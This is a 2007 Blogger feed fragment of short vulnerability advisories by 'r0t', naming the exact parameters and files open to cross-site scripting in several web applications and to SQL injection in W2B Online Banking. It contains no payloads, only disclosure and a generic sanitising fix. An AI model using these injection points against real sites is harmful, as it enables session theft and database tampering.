src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-7255591622090297564</id><published>2007-06-21T04:31:00.000-07:00</published><updated>2007-06-21T04:32:42.348-07:00</updated><title type='text'>Interact Multiple XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 21 June  2007&lt;br /&gt;vendor:www.interactole.org&lt;br /&gt;affected versions: tested on "Interact 2.4 beta 1"&lt;br /&gt;other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Interact contains a multiple flaws that allows a remote Cross-Site Scripting attacks.Input passed to the "module_key" parameter in  almost&lt;br /&gt;all files wich use this parameter isn't properly sanitised before being returned to the user.&lt;br /&gt;in example:&lt;br /&gt;modules/kb/kb.php,&lt;br /&gt;modules/quiz/runquiz.php&lt;br /&gt;modules/quiz/quiz.php&lt;br /&gt;modules/forum/forum.php&lt;br /&gt;modules/forum/byname.php&lt;br /&gt;modules/journal/journalview.php&lt;br /&gt;And Input passed to the "tag_key" parameter in "modules/journal/journalview.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;And Input passed to the "user_group_key" parameter in "users/secureaccounts.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;And Input passed to the "request_uri" parameter in "login.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-7255591622090297564?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/7255591622090297564/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=7255591622090297564' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7255591622090297564'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7255591622090297564'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/06/interact-multiple-xss-vuln.html' title='Interact Multiple XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-9131306771767092689</id><published>2007-06-12T01:41:00.001-07:00</published><updated>2007-06-12T01:41:56.437-07:00</updated><title type='text'>Sporum Forum XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 12 June  2007&lt;br /&gt;vendor:http://sporum.js-x.com/&lt;br /&gt;affected versions: 3.0.9 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Sporum Forum contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "view" and "mode" parameter in "comments.cgi" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-9131306771767092689?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/9131306771767092689/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=9131306771767092689' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/9131306771767092689'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/9131306771767092689'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/06/sporum-forum-xss-vuln.html' title='Sporum Forum XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-9124185541300760959</id><published>2007-06-12T00:21:00.000-07:00</published><updated>2007-06-12T00:22:52.660-07:00</updated><title type='text'>PHP Live! Support XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 12 June  2007&lt;br /&gt;vendor:http://www.phplivesupport.com/&lt;br /&gt;affected versions: 3.2.2 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PHP Live! contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "pagex" parameter in "request.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-9124185541300760959?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/9124185541300760959/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=9124185541300760959' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/9124185541300760959'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/9124185541300760959'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/06/php-live-support-xss-vuln.html' title='PHP Live! Support XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-3202881120675291701</id><published>2007-05-29T15:12:00.000-07:00</published><updated>2007-05-29T15:20:08.289-07:00</updated><title type='text'>W2B Online Banking vuln.</title><content type='html'>&lt;h3 class="post-title"&gt;&lt;br /&gt;       &lt;/h3&gt;                     &lt;p&gt;       &lt;/p&gt;###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 29 may 2007&lt;br /&gt;vendorlink:www.w2b.ru/OnlineBanking/index.php&lt;br /&gt;affected versions:last/actual&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;1.&lt;br /&gt;W2B Online Banking contains a flaw that allows a remote sql injection attacks.Input passed to the "draft" parameter in "mailer.w2b" and "listDocPay" parameter in "DocPay.w2b" isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;2.&lt;br /&gt;W2B Online Banking contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "adtype" parameter in "auth.w2b" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;how i missed that stuff? anyway it's just a bug sampler.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-3202881120675291701?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/3202881120675291701/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=3202881120675291701' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3202881120675291701'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/3202881120675291701'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/05/w2b-online-banking-vuln.html' title='W2B Online Banking vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-7502583698332681140</id><published>2007-05-19T05:58:00.000-07:00</published><updated>2007-05-19T06:10:47.599-07:00</updated><title type='text'>GNATS XSS vuln</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 19 May  2007&lt;br /&gt;vendor:http://www.gnu.org/software/gnats/&lt;br /&gt;affected versions: Gnatsweb v4.00, Gnats v4.1.99&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Gnats contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "database" parameter in "gnatsweb.pl" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-7502583698332681140?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/7502583698332681140/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=7502583698332681140' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7502583698332681140'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7502583698332681140'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/05/blog-post.html' title='GNATS XSS vuln'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-7002599141861621395</id><published>2007-05-19T03:53:00.001-07:00</published><updated>2007-05-19T03:53:36.271-07:00</updated><title type='text'>Track+ XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 19 May  2007&lt;br /&gt;vendor:http://www.trackplus.com/&lt;br /&gt;affected versions: 3.3.2 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Track+ contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "projId" parameter in "reportItem.do" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-7002599141861621395?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/7002599141861621395/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=7002599141861621395' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7002599141861621395'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7002599141861621395'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/05/track-xss-vuln.html' title='Track+ XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-9143038104641974041</id><published>2007-05-19T03:48:00.000-07:00</published><updated>2007-05-19T03:49:31.646-07:00</updated><title type='text'>ClientExec XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 19 May  2007&lt;br /&gt;vendor:http://clientexec.com/&lt;br /&gt;affected versions: 3.0.0 beta2 other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ClientExec contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "ticketID","view","fuse" parameter in "index.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-9143038104641974041?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/9143038104641974041/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=9143038104641974041' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/9143038104641974041'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/9143038104641974041'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/05/clientexec-xss-vuln.html' title='ClientExec XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-4313172775128967815</id><published>2007-05-18T15:09:00.000-07:00</published><updated>2007-05-18T15:10:06.053-07:00</updated><title type='text'>CandyPress™ Store XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 18 May  2007&lt;br /&gt;vendor:http://www.candypress.com/&lt;br /&gt;affected versions: v3.5.2.14 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CandyPress™ Store contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "brand" and "Msg" parameter in "scripts/prodList.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-4313172775128967815?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/4313172775128967815/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=4313172775128967815' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/4313172775128967815'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/4313172775128967815'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/05/candypress-store-xss-vuln.html' title='CandyPress™ Store XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-120198177720402824</id><published>2007-05-18T15:05:00.000-07:00</published><updated>2007-05-18T15:08:06.838-07:00</updated><title type='text'>Parodia XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 18 May  2007&lt;br /&gt;vendor:http://parodia.net/&lt;br /&gt;affected versions: v6.4 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Parodia contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "strJobIDs" parameter in "cand_login.asp" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-120198177720402824?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/120198177720402824/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=120198177720402824' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/120198177720402824'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/120198177720402824'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/05/parodia-xss-vuln.html' title='Parodia XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-7491197056823155490</id><published>2007-05-16T10:23:00.000-07:00</published><updated>2007-05-16T10:29:27.963-07:00</updated><title type='text'>vDeck WebMail System XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 16 May  2007&lt;br /&gt;vendor:http://vdeck.com/&lt;br /&gt;affected versions: 4.03,other versions also can be affected.&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;vDeck WebMail System contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "type" parameter in "printcal.pl" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-7491197056823155490?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/7491197056823155490/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=7491197056823155490' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7491197056823155490'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/7491197056823155490'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/05/vdeck-webmail-system-xss-vuln.html' title='vDeck WebMail System XSS vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1009764183767741775.post-6403202602168924062</id><published>2007-05-16T10:01:00.000-07:00</published><updated>2007-05-16T10:12:27.411-07:00</updated><title type='text'>Pridels Team is Back!</title><content type='html'>Hi guys, it was a big breakdown and now is time to post some "daily" garbage  with unsecured systems.I made new blog , cauz i cant find mine pwd for it.I think after month that we will set our board back.Now im here with VietMafia, der4444 . I hope that we will see cembo again.&lt;br /&gt;&lt;br /&gt;r0t&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1009764183767741775-6403202602168924062?l=pridels-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels-team.blogspot.com/feeds/6403202602168924062/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1009764183767741775&amp;postID=6403202602168924062' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/6403202602168924062'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1009764183767741775/posts/default/6403202602168924062'/><link rel='alternate' type='text/html' href='http://pridels-team.blogspot.com/2007/05/pridels-team-is-back.html' title='Pridels Team is Back!'/><author><name>r0t</name><uri>http://www.blogger.com/profile/10020805488138121878</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
